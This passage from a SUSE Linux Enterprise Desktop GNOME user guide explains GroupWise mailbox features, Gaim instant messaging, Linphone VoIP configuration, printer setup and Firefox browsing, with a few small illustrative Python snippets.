All e-mail items from addresses and Internet domains that are junked through Junk Mail Handling are placed in the Junk Mail folder. This folder is not created in the folder list unless a Junk Mail option is enabled. While Junk Mail options are enabled, this folder cannot be deleted. However, the folder can be renamed or moved to a different location in the folder list. If all Junk Mail options are disabled, the folder can be deleted. The folder can also be deleted if the Junk Mail Handling feature is disabled by the system administrator. To delete items from the Junk Mail folder, right-click the folder, click Empty Junk Mail Folder, then click Yes.

Trash Folder

All deleted mail and phone messages, appointments, tasks, documents, and reminder notes are stored in the Trash folder. Items in the Trash can be viewed, opened, or returned to your Mailbox before the Trash is emptied. (Emptying the Trash removes items in the Trash from the system.) You can empty your entire Trash, or empty only selected items. Items in the Trash are emptied automatically according to the number of days entered on the Cleanup tab in Environment Options, or you can empty the Trash manually. The system administrator might specify that your Trash is emptied automatically on a regular basis.

Shared Folders

A shared folder is like any other folder in your Cabinet, except other people have access to it. You can create shared folders or share existing personal folders in your Cabinet. You choose whom to share the folder with, and what rights to grant each user. Then, users can post messages to the shared folder, drag existing items into the folder, and create discussion threads. You can’t share system folders, which include the Cabinet, Trash, and Work In Progress folders.
5.1.4 Item List
The Item List on the right side of the Main Window displays your mail and phone messages, appointments, reminder notes, tasks, and document references. You can sort the Item List by clicking a column heading. To reverse the sort order, click the column heading a second time. For information about the icons used with different items, see “Icons Appearing Next to Items in Your Mailbox and Calendar” on page 105.
5.1.5 QuickViewer
The QuickViewer opens below the Folder and Item List. You can quickly scan items and their attachments in the QuickViewer rather than open each item in another window.
5.2 Using Different GroupWise Modes
GroupWise provides two different ways to run the GroupWise client: Online mode and Caching mode. You might be able to run GroupWise in either mode, or your system administrator might require that you use only a certain mode. Most GroupWise features are available in both GroupWise modes, with some exceptions. Subscribing to other users’ notifications is not available in Caching mode.
5.2.1 Online Mode

5.2.2 Caching Mode
5.3 Understanding Your Mailbox

You can organize your messages by moving them into folders within your Cabinet, and you can create new folders as necessary.
5.3.1 Bolded Items in Your Mailbox
All unopened items in your Mailbox are bolded to help you easily identify which items and documents you have not yet read. The icon appearing next to an item also indicates if it is unopened. Sent items are also bolded to show when they are queued but not uploaded, status information has not been received about the item being delivered, or they have not yet been transferred to the Internet.
5.3.2 Icons Appearing Next to Items in Your Mailbox and Calendar
The icons that appear next to items in your Mailbox and Calendar show information about the items. The following table explains what each icon means.
Table 5-3 Icon Descriptions (the icons themselves are graphics and do not appear in this text version; each entry describes one icon)

• Next to an item you have sent in Caching mode, indicates that the item has been queued, but the queue has not been uploaded. After the item has been uploaded, this icon indicates that status information has not been received about the item being delivered to the destination post office or transferred to the Internet. Next to the Sent Items folder, the icon indicates that there is at least one item that has been queued but has not been uploaded.
• Appears next to an item you have sent. If the item has been opened by at least one person, this icon appears until all recipients have 1) opened the mail, phone message, or reminder note; 2) accepted the appointment; or 3) completed the task.
• Appears next to an item you have sent. The item couldn’t be delivered to the destination post office or it failed to transfer to the Internet.
• Appears next to an item you have sent. Next to an appointment or task, this icon indicates that at least one person has declined or deleted the item. Next to a mail message, phone message, or reminder note, this icon indicates that at least one person has deleted the item without opening it.
• One or more attachments are included with the item.
• One or more sound annotations are included with the item, or the item is a voice mail message.
• Draft item.
• Appears next to an item you have sent.
• Appears next to an item you have replied to.
• Appears next to an item you have forwarded.
• Appears next to an item you have delegated.
• Appears next to an item you have replied to and forwarded.
• Appears next to an item you have replied to and delegated.
• Appears next to an item you have forwarded and delegated.
• Appears next to an item you have replied to, forwarded, and delegated.
• Posted item.
• Specific version of a document.
• Official version of a document.
• Unopened mail message with a low, standard, or high priority.
• Opened mail message with a low, standard, or high priority.
• Unopened appointment with a low, standard, or high priority.
• Opened appointment with a low, standard, or high priority.
• Unopened task with a low, standard, or high priority.
• Opened task with a low, standard, or high priority.
• Unopened reminder note with a low, standard, or high priority.
• Opened reminder note with a low, standard, or high priority.
• Unopened phone message with a low, standard, or high priority.
• Opened phone message with a low, standard, or high priority.
• The sender has requested that you reply to this item. The item can be a low, standard, or high priority.
• Appears in a Busy Search. If it appears to the left of a username or resource, you can click a scheduled time across from the username or resource on the Individual Schedules tab to display more information about the appointment in the box below. However, the user or resource owner must give you appointment Read rights in the Access List before this icon appears.
• Appears on your Calendar; indicates an alarm is set for the item.
• Appears on your Calendar; indicates the item is a group appointment, reminder note, or task.
• Appears on your Calendar; indicates the item is marked private.
• Appears on your Calendar; indicates that you declined the item but didn’t delete it.
5.4 Using the Toolbar
Use the toolbar to access many of the features and options found in GroupWise. The toolbar at the top of a folder or item is context sensitive; it changes to provide the options you need most in that location.
5.5 Using Shortcut Keys
You can use a number of shortcut keys in GroupWise for accessibility or to save time when you perform various operations. The table below lists some of these keystrokes, what they do, and the context where they work.
Table 5-4 Shortcut Keys
Each entry below lists the keystroke, its action, and where it works.

F1: Open online help (Main Window, Calendar, item, dialog box)
F2: Search for text (In an item)
F5: Refresh the view (Main Window, Calendar)
F7: Open the Spell Checker (In an item)
F8: Mark the selected item private (Item List)
F9: Open the font dialog box (In an item)
Ctrl+A: Select all items; select all text (Item List; text)
Ctrl+B: Bold text (In text)
Ctrl+C: Copy selected text (In text)
Ctrl+F: Open the Find dialog box (Main Window, Calendar, item, dialog box)
Ctrl+G: Go to today’s date (Calendar)
Ctrl+I: Italicize text (In text)
Ctrl+L: Attach a file to a message (In an item)
Ctrl+M: Open a new mail message (Main Window, Calendar, item, dialog box)
Ctrl+O: Open the selected message (Item List)
Ctrl+P: Open the Print dialog box (Main Window, item)
Ctrl+Q: Turn the QuickViewer on and off (Main Window, Calendar)
Ctrl+R: Mark the selected item unread (Item List)
Ctrl+S: Save a draft in the Work in Progress folder (In an item)
Ctrl+U: Underline text (In text)
Ctrl+V: Paste selected text (In text)
Ctrl+X: Cut selected text (In text)
GroupWise Linux Client: E-Mailing and Calendaring 107
Ctrl+Z: Undo the last action (In text)
Ctrl+Up-arrow or Ctrl+Down-arrow: Open the previous or next item (In an item)
Ctrl+Shift+Left-arrow or Ctrl+Shift+Right-arrow: Select text one word at a time (In text)
Ctrl+Shift+A: Open a new appointment (Main Window, Calendar, item, dialog box)
Ctrl+Shift+T: Open a new task (Main Window, Calendar, item, dialog box)
Ctrl+Shift+R: Open a new reminder note (Main Window, Calendar, item, dialog box)
Ctrl+Shift+P: Open a new phone message (Main Window, Calendar, item, dialog box)
Alt+F4: From the Main Window or Calendar, exit GroupWise; from an item, exit the item; from a dialog box, exit the dialog box (Main Window, Calendar, item, dialog box)
Alt+[letter]: Activate the menu bar; use the underlined letters in the menu names (Main Window, Calendar, item)
Alt+D: Send item (In a new item)
Alt+S: Send item (In a new item)
Alt+Enter: Display the properties of the selected item (Item List)
Alt+Del: Delete an item (In an item)
Shift+Left-arrow or Shift+Right-arrow: Select text one character at a time (In text)
Shift+End or Shift+Home: Select text to the end or beginning of a line (In text)
Shift+[letter]: In the Folder List, Shift plus the first letter of a subfolder name goes to the subfolder (Folder List)
Tab: Cycle through fields, buttons, and areas (Main Window, Calendar, dialog box, item)
Shift+Tab: Reverse the order of cycling through fields, buttons, and areas (Main Window, Calendar, dialog box, item)
Ctrl+Tab: In text, indent the text; in a tabbed dialog box, open the next tab (In text, dialog box)
Alt+Up-arrow: Zoom in the message body of an item (In an item)
Alt+Down-arrow: Zoom out the message body of an item (In an item)
5.6 Learning More
You can learn more about GroupWise from the following resources:
• “Online Help” on page 109
• “GroupWise 7 Documentation Web Page” on page 109
• “GroupWise Cool Solutions Web Community” on page 109
5.6.1 Online Help
Complete user documentation is available in Help. In the Main Window, click Help > Help Topics, then use the Contents tab, Index tab, or Search tab to locate the help topics you want.
5.6.2 GroupWise 7 Documentation Web Page
For the latest version of the GroupWise user guide and for extensive GroupWise administration documentation, go to the GroupWise 7 area on the Novell Documentation Web site. This user guide is also available from the GroupWise client by clicking Help > User Guide.
5.6.3 GroupWise Cool Solutions Web Community
At GroupWise Cool Solutions, you’ll find tips, tricks, feature articles, and answers to frequent questions. In the Main Window, click Help > Cool Solutions Web Community.
6 Instant Messaging with Gaim
This chapter covers the following topics:
• Section 6.1, “Supported Protocols,” on page 111
• Section 6.2, “Setting Up an Account,” on page 111
• Section 6.3, “Managing Your Buddy List,” on page 112
• Section 6.4, “Chatting,” on page 112
6.1 Supported Protocols
Gaim supports the following instant messaging protocols:
• AIM/ICQ
• Gadu-Gadu
• GroupWise
• IRC
• Jabber
• MSN
• Napster
• Yahoo
• Zephyr
6.2 Setting Up an Account
To use Gaim, you must already have accounts on the systems you want to use. For example, to use Gaim for your AIM account, you must first have an AIM account. Once you have those accounts, set them up in the Gaim Add Account dialog.
1 Start Gaim by clicking Computer > More Applications > Communicate > Gaim.
2 Click Accounts > Add to open the Add Account dialog.
The first time you run Gaim, or any subsequent times you start Gaim when you don’t have any accounts set up, the Add Account dialog opens automatically.
3 Choose the protocol you want to set up.
The Add Account dialog differs for each protocol, depending on what setup options are available for that protocol.
4 Enter the setup options for the chosen protocol.
Instant Messaging with Gaim 111
Typical options include your account name and password. Your protocol might support additional options, such as a buddy icon, alias, login options, or others.
5 Click Save.
6 Repeat Steps 2 to 5 for each additional protocol.
Once an account is added, you can log in to that account by entering your account name and password in the Gaim Login dialog.
6.3 Managing Your Buddy List
Use the Buddy List to manage your contacts, also known as buddies. You can add and remove buddies from your Buddy List, and you can organize your buddies in groups so they are easy to find.
6.3.1 Displaying Buddies in the Buddy List
Once your accounts are set up, all buddies who are online appear in your Buddy List. If you also want your buddies who are not online to appear in the Buddy List, click Buddies > Show Offline Buddies.
6.3.2 Adding a Buddy
To add a buddy to your Buddy List, click Buddies > Add Buddy, then enter the information about that buddy.

NOTE: For some protocols, you cannot add a buddy in the Gaim interface. You must use the client for those protocols to add buddies. After you have added a buddy in the protocol’s client, that buddy appears in your Gaim Buddy List.
6.3.3 Removing a Buddy
To remove a buddy, right-click on that buddy’s name in the Buddy List, then click Remove.
6.4 Chatting
To open a chat session, double-click a buddy name in the Buddy List. The Chat screen opens. Type your message, then press Enter to send it. Each chat session you open appears as a tab in the Chat screen. Click on a buddy’s tab to chat with that buddy. Close a chat session by closing the tab for that buddy.
7 Using Voice over IP
This chapter describes how to set up and use Linphone, a Voice over IP application for your Linux desktop.
7.1 Configuring Linphone
Before you start using Linphone, there are some basic decisions to make and some configuration tasks to complete. First, determine and configure the run mode of Linphone and determine the connection type to use. Then start the Linphone configuration (Go > Preferences) to make the necessary adjustments.
7.1.1 Determining the Run Mode of Linphone
Linphone can be run in two different modes, depending on the type of desktop you run and on its configuration.

Normal Application: After the Linphone software has been installed, it can be started via the GNOME and KDE application menus or via the command line. When Linphone is not running, incoming calls cannot be received.

GNOME Panel Applet: Linphone can be added to the GNOME panel. Right-click an empty area in the panel, select Add to Panel, and select Linphone. Linphone is then permanently added to the panel and automatically started on login. As long as you do not receive any incoming calls, it runs in the background. As soon as you get an incoming call, the main window opens and you can receive the call. To open the main window to call someone, just click the applet icon.
7.1.2 Determining the Connection Type
There are several different ways to make a call in Linphone. How you make a call and how you reach the other party is determined by the way you are connected to the network or the Internet. Linphone uses the session initiation protocol (SIP) to establish a connection with a remote host. In SIP, each party is identified by a SIP URL:
sip:username@hostname
username is your login on your Linux machine, and hostname is the name of the computer you are using. If you use a SIP provider, the URL would look like the following example:
sip:username@sipserver
username is the username chosen when registering at a SIP server. sipserver is the address of the SIP server or your SIP provider. For details on the registration procedure, refer to “Configuring the SIP Options” on page 115 and check the provider's registration documentation. For a list of
Using Voice over IP 113
providers suitable for your purpose, check the Web pages mentioned in “For More Information” on page 119. The URL to use is determined by the type of connection you choose. If you chose to call another party directly without any further routing by a SIP provider, you would enter a URL of the first type. If you chose to call another party via a SIP server, you would enter a URL of the second type.

Calling in the Same Network: If you intend to call a friend or coworker belonging to the same network, you just need the correct username and hostname to create a valid SIP URL. The same applies if this person wants to call you. As long as there is no firewall between you and the other party, no further configuration is required.

Calling across Networks or the Internet (Static IP Setup): If you are connected to the Internet using a static IP address, anyone who wants to call you just needs your username and the hostname or IP address of your workstation to create a valid SIP URL, as described in “Calling in the Same Network” on page 114. If you or the calling party is located behind a firewall that filters incoming and outgoing traffic, open the SIP port (5060) and the RTP port (7078) on the firewall machine to enable Linphone traffic across the firewall.

Calling across Networks or the Internet (Dynamic IP Setup): If your IP setup is not static, meaning you dynamically get a new IP address every time you connect to the Internet, it is impossible for any caller to create a valid SIP URL based on your username and an IP address. In these cases, either use the services offered by a SIP provider or use a DynDNS setup to make sure that an external caller gets connected to the right host machine. More information about DynDNS can be found at Wikipedia.org.

Calling across Networks and Firewalls: Machines hidden behind a firewall do not reveal their IP address over the Internet. Thus, they cannot be reached directly by anyone trying to call a user working at such a machine.
Linphone supports calling across network borders and firewalls by using a SIP proxy or relaying the calls to a SIP provider. Refer to “Configuring the SIP Options” on page 115 for a detailed description of the necessary adjustments for using an external SIP server.
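The two SIP URL forms described in this section can be sketched in a few lines of Python. This is only an illustration: the user and host names below are placeholder values, not addresses from this guide.

```python
# Sketch of the two SIP URL forms: direct (username@hostname) and
# provider-based (username@sipserver). All names are placeholders.
def sip_url(user: str, host: str) -> str:
    """Build a SIP URL of the form sip:user@host."""
    return f"sip:{user}@{host}"

# Direct call to a coworker in the same network:
direct = sip_url("tux", "linux-host")
# Call routed through a hypothetical SIP provider:
proxied = sip_url("tux", "sip.example.org")

print(direct)   # sip:tux@linux-host
print(proxied)  # sip:tux@sip.example.org
```

Either form is what you would type into Linphone's SIP address field, depending on the connection type you chose above.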
7.1.3 Configuring the Network Parameters
Most of the settings contained in the Network tab do not need any further adjustments. You should be able to make your first call without changing them.

NAT Traversal Options: Enable this option only if you find yourself in a private network behind a firewall and if you do not use a SIP provider to route your calls. Select the check box and enter the IP address of the firewall machine in dot notation, for example, 192.168.34.166.

RTP Properties: Linphone uses the real-time transport protocol (RTP) to transmit the audio data of your calls. The port for RTP is set to 7078 and should not be modified unless you have another application using this port. The jitter compensation parameter controls the number of audio packets Linphone buffers before actually playing them. By increasing this parameter,
you improve the quality of transmission. The more packets buffered, the greater the chance for “late comers” to be played back. On the other hand, increasing the number of buffered packets also increases the latency: you hear the voice of your counterpart with a certain delay. When changing this parameter, carefully balance these two factors.

Other: If you use a combination of VoIP and landline telephony, you might want to use the dual-tone multifrequency (DTMF) technology to trigger certain actions, like a remote check of your voice mail just by pressing certain keys. Linphone supports two protocols for DTMF transmission, SIP INFO and RTP rfc2833. If you need DTMF functionality in Linphone, choose a SIP provider that supports one of these protocols. For a comprehensive list of VoIP providers, refer to “For More Information” on page 119.
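The jitter compensation tradeoff can be illustrated with a small sketch. The assumption that each RTP packet carries 20 ms of audio is mine (the real duration depends on the codec in use), not a value from this guide.

```python
# Illustration of the jitter buffer tradeoff: buffering more packets
# means fewer dropped "late comers" but a longer playback delay.
# ASSUMPTION: 20 ms of audio per RTP packet (codec-dependent).
MS_PER_PACKET = 20

def added_latency_ms(buffered_packets: int) -> int:
    # Each buffered packet delays playback by one packet duration.
    return buffered_packets * MS_PER_PACKET

for n in (1, 5, 10):
    print(f"{n} buffered packets -> {added_latency_ms(n)} ms extra latency")
```

The numbers make the balance concrete: a ten-packet buffer tolerates far more network jitter than a one-packet buffer, but at the cost of roughly 200 ms of extra delay before you hear the other party.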
7.1.4 Configuring the Sound Device
Once your sound card has been properly detected by Linux, Linphone automatically uses the detected device as the default sound device. Leave the value of Use sound device as it is. Use Recording source to determine which recording source should be used. In most cases, this would be a microphone (micro). To select a custom ring sound, use Browse to choose one and test your choice using Listen. Click Apply to accept your changes.
7.1.5 Configuring the SIP Options
The SIP dialog contains all SIP configuration settings.

SIP Port: Determine on which port the SIP user agent should run. The default port for SIP is 5060. Leave the default setting unchanged unless you know of any other application or protocol that needs this port.

Identity: Anyone who wants to call you directly without using a SIP proxy or a SIP provider needs to know your valid SIP address. Linphone creates a valid SIP address for you.

Remote Services: This list holds one or more SIP service providers where you have created a user account. Server information can be added, modified, or deleted at any time. See “Adding a SIP Proxy and Registering at a Remote SIP Server” on page 115 to learn about the registration procedure.

Authentication Information: To register at a remote SIP server, provide certain authentication data, such as a password and username. Linphone stores this data once provided. To discard this data for security reasons, click Clear all stored authentication data. The Remote services list can be filled with several addresses of remote SIP proxies or service providers.

Adding a SIP Proxy and Registering at a Remote SIP Server
1 Choose a suitable SIP provider and create a user account there.
2 Start Linphone.
3 Go to Go > Preferences > SIP.
4 Click Add proxy/registrar to open a registration form.
5 Fill in the appropriate values for Registration Period, SIP Identity, SIP Proxy, and Route.
If working from behind a firewall, always select Send registration and enter an appropriate value for Registration Period. This resends the original registration data after a given time to keep the firewall open at the ports needed by Linphone. Otherwise, these ports would automatically be closed if the firewall did not receive any more packets of this type. Resending the registration data is also needed to keep the SIP server informed about the current status of the connection and the location of the caller.
For SIP identity, enter the SIP URL that should be used for local calls. To use this server also as a SIP proxy, enter the same data for SIP Proxy. Finally, add an optional route, if needed, and leave the dialog with OK.
7.1.6 Configuring the Audio Codecs
Linphone supports several codecs for the transmission of voice data. Set your connection type and choose your preferred codecs from the list window. Codecs not suitable for your current connection type are displayed in red and cannot be selected.
7.2 Testing Linphone
Check your Linphone configuration using sipomatic, a small test program that can answer calls made from Linphone.

Testing a Linphone Setup
1 Open a terminal.
2 Enter sipomatic at the command line prompt.
3 Start Linphone.
4 Enter sip:[email protected]:5064 as the SIP address and click Call or Answer.
5 If Linphone is configured correctly, you hear a phone ringing and, after a short while, a short announcement.

If you successfully completed this procedure, you can be sure that your audio setup and the network setup are working. If this test fails, check whether your sound device is correctly configured and whether the playback level is set to a reasonable value. If you still fail to hear anything, check the network setup, including the port numbers for SIP and RTP. If any other application or protocol uses the default ports for these as proposed by Linphone, consider changing ports and retry.
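If the test fails because of a port conflict, a quick way to see whether another application already holds one of the default UDP ports is to try binding it. This diagnostic sketch is not part of Linphone; it only checks local port availability on your own machine.

```python
# Check whether a local UDP port (such as SIP's 5060 or RTP's 7078)
# is still free by attempting to bind it on the loopback address.
import socket

def udp_port_free(port: int) -> bool:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.bind(("127.0.0.1", port))
        return True      # bind succeeded: nothing else holds the port
    except OSError:
        return False     # bind failed: another application uses it
    finally:
        s.close()

for port in (5060, 7078):
    print(port, "free" if udp_port_free(port) else "in use")
```

If a port reports "in use", either close the application holding it or change the corresponding port number in the Linphone preferences.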
7.3 Making a Call
Once Linphone is configured appropriately, making a call is straightforward. Depending on the type of call (see “Determining the Connection Type” on page 113 for reference), the calling procedures differ slightly.
1 Start Linphone using the menu or a command line.
2 Enter the SIP address of the other party at the SIP address prompt.
The address should look like sip:username@domainname or username@hostname for direct local calls, or like username@sipserver or userid@sipserver for proxied calls or calls using the service of a SIP provider.
3 If using a SIP service provider or a proxy, select the appropriate proxy or provider from Proxy to use and provide the authentication data requested by this proxy.
4 Click Call or Answer and wait for the other party to pick up the phone.
5 Once you are done or wish to end the call, click Release or Refuse and leave Linphone.

If you need to tweak the sound parameters during a call, click Show more to show four tabs holding more options.

The first one holds the Sound options for Playback level and Recording level. Use the sliders to adjust both volumes to fit your needs.

The Presence tab lets you set your online status. This information can be relayed to anyone who tries to contact you. If you are permanently away and wish to inform the calling party of this fact, just check Away. If you are just busy, but want the calling party to retry, check Busy, I'll be back in ... min and specify how long you will not be reachable. Once you are reachable again, set the status back to the default (Reachable). Whether another party can check your online status is determined by the Subscribe Policy set in the address book, as described in “Using the Address Book” on page 117. If any party listed in your address book published their online status, you can monitor it using the My online friends tab.

The DTMF tab can be used to enter DTMF codes for checking voice mail. To check your voice mail, enter the appropriate SIP address and use the keypad in the DTMF tab to enter the voice mail code. Finally, click Call or Answer as if you were making an ordinary call.
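As background for the DTMF keypad mentioned above: each key is encoded as a pair of simultaneous tones, one from a low-frequency group and one from a high-frequency group. The frequencies in this sketch are the standard DTMF values, not something configured in Linphone.

```python
# Standard DTMF keypad layout: each key maps to one low-group (row)
# and one high-group (column) frequency, in Hz.
ROWS = (697, 770, 852, 941)     # low-tone group
COLS = (1209, 1336, 1477)       # high-tone group
KEYPAD = ("123", "456", "789", "*0#")

def dtmf_pair(key: str) -> tuple:
    """Return the (low, high) tone pair for a keypad key."""
    for r, row in enumerate(KEYPAD):
        if key in row:
            return (ROWS[r], COLS[row.index(key)])
    raise ValueError(f"not a DTMF key: {key!r}")

print(dtmf_pair("5"))  # (770, 1336)
print(dtmf_pair("#"))  # (941, 1477)
```

The decoder on the voice mail side recognizes each unique tone pair and translates it back into the key you pressed.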
7.4 Answering a Call
Depending on the run mode selected for Linphone, there are several ways you would notice an incoming call:

Normal Application: Incoming calls can only be received and answered if Linphone is already running. You then hear the ring sound on your headset or your speakers. If Linphone is not running, the call cannot be received.

GNOME Panel Applet: Normally, the Linphone panel applet would run silently without giving any notice of its existence. This changes as soon as a call comes in: the main window of Linphone opens and you hear a ring sound on your headset or speakers.

Once you have noticed an incoming call, just click Call or Answer to pick up the phone and start talking. If you do not want to accept this call, click Release or Refuse.
7.5 Using the Address Book
Linphone offers an address book to manage your SIP contacts. Start the address book with Go > Address book. An empty list window opens. Click Add to add a contact. The following entries need to be made for a valid contact:

Name: Enter the name of your contact. This may be a full name, but you can also use a nickname here. Choose something you easily remember this person by. If you choose to see this person's online status, this name is shown in the My online friends tab of the main window.
SIP Address: Enter a valid SIP address for your contact.

Proxy to Use: If needed, enter the proxy to use for this particular connection. In most cases, this would just be the SIP address of the SIP server you use.

Subscribe Policy: Your subscribe policy determines whether your presence or absence can be tracked by others.

To call any contact from the address book, select this contact with the mouse, click Select to make the address appear in the address field of the main window, and start the call with Call or Answer as usual.
7.6 Troubleshooting
I try to call someone, but fail to establish a connection.
There are several reasons why a call could fail:

Your connection to the Internet is broken. Because Linphone uses the Internet to relay your calls, make sure that your computer is properly connected to and configured for the Internet. This can easily be tested by trying to view a Web page using your browser. If the Internet connection works, the other party might not be reachable.

The person you are calling is not reachable. If the other party refused your call, you would not be connected. If Linphone is not running on the other party's machine while you are calling, you will not be connected. If the other party's Internet connection is broken, you cannot make the connection.

My call seems to connect, but I cannot hear anything.
First, make sure that your sound device is properly configured. Do this by launching any other application using sound output, such as a media player. Make sure that Linphone has sufficient permissions to open this device. Close all other programs using the sound device to avoid resource conflicts. If the above checks were successful, but you still fail to hear anything, raise the recording and playback levels under the Sound tab.

The voice output on both ends sounds strangely clipped.
Try to adjust the jitter buffer using RTP properties in Preferences > Network to compensate for delayed voice packets. When doing this, be aware that it increases the latency.

DTMF does not work.
You tried to check your voice mail using the DTMF pad, but the connection could not be established. There are three different protocols used for the transmission of DTMF data, but only two of these are supported by Linphone (SIP INFO and RTP rfc2833). Check with your provider whether it supports one of these. The default protocol used by Linphone is rfc2833, but if that fails you can set the protocol to SIP INFO in Preferences > Network > Other.
If it does not work with either of them, DTMF transmission cannot be done using Linphone.
7.7 Glossary
Find a brief explanation of the most important technical terms and protocols mentioned in this document:

VoIP: VoIP stands for voice over Internet protocol. This technology allows the transmission of ordinary telephone calls over the Internet using packet-linked routes. The voice information is sent in discrete packets like any other data transmitted over the Internet via IP.

SIP: SIP stands for session initiation protocol. This protocol is used to establish media sessions over networks. In a Linphone context, SIP is the magic that triggers the ring at your counterpart's machine, starts the call, and also terminates it as soon as one of the partners decides to hang up. The actual transmission of voice data is handled by RTP.

RTP: RTP stands for real-time transport protocol. It allows the transport of media streams over networks and works over UDP. The data is transmitted by means of discrete packets that are numbered and carry a time stamp to allow correct sequencing and the detection of lost packets.

DTMF: A DTMF encoder, like a regular telephone, uses pairs of tones to represent the various keys. Each key is associated with a unique combination of one high and one low tone. A decoder then translates these touch-tone combinations back into numbers. Linphone supports DTMF signalling to trigger remote actions, such as checking voice mail.

codec: Codecs are algorithms specially designed to compress audio and video data.

jitter: Jitter is the variance of latency (delay) in a connection. Audio devices or connection-oriented systems, like ISDN or PSTN, need a continuous stream of data. To compensate for this, VoIP terminals and gateways implement a jitter buffer that collects the packets before relaying them onto their audio devices or connection-oriented lines (like ISDN). Increasing the size of the jitter buffer decreases the likelihood of data being missed, but the latency of the connection is increased.
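The RTP entry notes that per-packet numbering lets a receiver detect lost packets. A minimal sketch of that idea (real RTP sequence numbers are 16-bit and wrap around; this sketch ignores wraparound for clarity):

```python
# Sketch: how per-packet sequence numbers let a receiver spot gaps
# in the stream, as described in the RTP glossary entry.
def missing_packets(received_seqs):
    """Return the sequence numbers absent between first and last seen."""
    seen = set(received_seqs)
    lo, hi = min(seen), max(seen)
    return [s for s in range(lo, hi + 1) if s not in seen]

print(missing_packets([1, 2, 4, 5, 7]))  # [3, 6]
```

A VoIP receiver uses exactly this kind of gap information, together with the packet time stamps, to decide what to conceal or re-sequence before playback.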
7.8 For More Information
For general information about VoIP, check the VoIP Wiki at voip-info.org. For a comprehensive list of providers offering VoIP services in your home country, refer to the service providers list at voip-info.org.
8 Managing Printers
SUSE® Linux Enterprise Desktop (SLED) makes it easy to print your documents, whether your computer is connected directly to a printer or linked remotely on a network. This chapter describes how to set up printers in SLED and manage print jobs with the following tasks:
• “Installing a Printer” on page 121
• “Modifying Printer Settings” on page 122
• “Canceling Print Jobs” on page 122
• “Deleting a Printer” on page 122
8.1 Installing a Printer
Before you can install a printer, you need to know the root password and have your printer information ready. Depending on how you connect to the printer, you might also need the printer URI, TCP/IP address or host, and the driver for the printer. A number of common printer drivers ship with SLED. If you cannot find a driver for the printer, check the printer manufacturer's Web site.
8.1.1 Installing a Network Printer
1 Click Computer > Control Center > Add Printer > New Printer.
2 Enter the root password.
3 Click Network Printer, then select the type of connection for this printer.
CUPS Printer (IPP): A printer attached to a different Linux system on the same network running CUPS, or a printer configured on another operating system to use IPP.
Windows Printer (SMB): A printer attached to a different system which is sharing a printer over an SMB network (for example, a printer attached to a Microsoft Windows machine).
UNIX Printer (LPD): A printer attached to a different UNIX system that can be accessed over a TCP/IP network (for example, a printer attached to another Linux system on your network).
HP JetDirect: A printer connected directly to the network instead of to a computer.
4 Specify the printer's information, then click Forward.
5 Select the printer driver for this printer, then click Apply.
You can also install a printer driver from a disk, or visit the printer manufacturer's Web site to download the latest driver.
6 Specify desired options (such as a description or location) for the printer in the Properties dialog box, then click Close.
The installed printer appears in the Printers panel. You can now print to the printer from any application.
8.1.2 Installing a Local Printer
1 Connect the printer cable to your computer and connect the printer's power supply.
Managing Printers 121
The printer dialog should open. If it doesn’t, click Computer > Control Center > Add Printer > New Printer to open it.
2 Enter the root password.
3 Click Local Printer.
4 If the printer was autodetected, select the printer from the list.
If the printer was not autodetected, click Use another printer by specifying a port, then select the correct printer port.
5 Click Forward.
6 Select the printer driver for this printer, then click Apply.
You can also install a printer driver from a disk, or visit the printer manufacturer's Web site to download the latest driver.
7 Specify desired options (such as a description or location) for the printer in the Properties dialog box, then click Close.
The installed printer appears in the Printers dialog box. You can now print to the printer from any application.
8.2 Modifying Printer Settings
1 Click Computer > Control Center > Printers.
2 Right-click the printer you want to modify, then click Properties.
3 Modify the properties, then click Close.
8.3 Canceling Print Jobs
1 Click Computer > Control Center > Printer.
2 Double-click the printer you sent the job to.
3 Right-click the print job, then click Cancel.
If the print job does not appear in the list, the print job might have been printed already.
8.4 Deleting a Printer
1 Click Computer > Control Center > Printer.
2 Click Edit > Become Administrator.
3 Type the root password, then click Continue.
4 Right-click the printer you want to delete, then click Remove.
III Internet
9 Browsing with Firefox
Included with your SUSE® Linux Enterprise Desktop is the Firefox Web browser.
9.1 Navigating Web Sites
Firefox has much the same look and feel as other browsers. It is shown in Figure 9-1 on page 125. The navigation toolbar includes Forward and Back and a location bar for a Web address. Bookmarks are also available for quick access. For more information about the various Firefox features, use the Help menu.
Figure 9-1 The Browser Window of Firefox
Browsing with Firefox 125
9.1.1 Tabbed Browsing
If you often use more than one Web page at a time, tabbed browsing may make it easier to switch between them. Load Web sites in separate tabs within one window. To open a new tab, select File > New Tab. This opens an empty tab in the Firefox window. Alternatively, right-click a link and select Open link in new tab. Right-click the tab itself to access more tab options. You can create a new tab, reload one or all existing tabs, or close them. You can also change the sequence of the tabs by dragging and dropping them to the desired position.
9.1.2 Using the Sidebar
Use the left side of your browser window for viewing bookmarks or the browsing history. Extensions may add new ways to use the sidebar as well. To display the Sidebar, select View > Sidebar and select the desired contents.
9.2 Finding Information
There are two ways to find information in Firefox: the search bar and the find bar. The search bar looks for pages while the find bar looks for things on the current page.
9.2.1 Finding Information on the Web
Firefox has a search bar that can access different engines, like Google, Yahoo, or Amazon. For example, if you want to find information about SUSE using the current engine, click in the search bar, type SUSE, and hit Enter. The results appear in your window. To choose your search engine, click the icon in the search bar. A menu opens with a list of available search engines.
9.2.2 Installing a Different Search Engine
If your favorite search engine is not listed, Firefox gives you the possibility to configure it. Try the following steps:
1 Establish an Internet connection first.
2 Click the icon in the search bar.
3 Select Add Engines from the menu.
4 Firefox displays a Web page with available search engines, sorted by categories. You can choose from Wikipedia, Leo, and others. Click the desired search plug-in.
5 Install your search plug-in with OK or abort with Cancel.
9.2.3 Searching in the Current Page
To search inside a Web page, click Edit > Find in This Page or press Ctrl+F. The find bar opens. Usually, it is displayed at the bottom of a window. Type your query in the input field. Firefox finds the first occurrence of this phrase. You can find further occurrences of the phrase by pressing F3 or clicking the Find Next button in the find bar. You can also highlight all occurrences by clicking the Highlight all button.
126 SUSE Linux Enterprise Desktop 10 GNOME User Guide
9.3 Managing Bookmarks
Bookmarks offer a convenient way of saving links to your favorite Web sites. To add the current Web site to your list of bookmarks, click Bookmarks > Bookmark This Page. If your browser currently displays multiple Web sites on tabs, only the URL on the currently selected tab is added to your list of bookmarks. When adding a bookmark, you can specify an alternative name for the bookmark and select a folder where Firefox should store it. To bookmark Web sites on multiple tabs, select Bookmark All Tabs. Firefox creates a new folder that includes bookmarks of each site displayed on each tab. To remove a Web site from the bookmarks list, click Bookmarks, right-click the bookmark in the list, then click Delete.
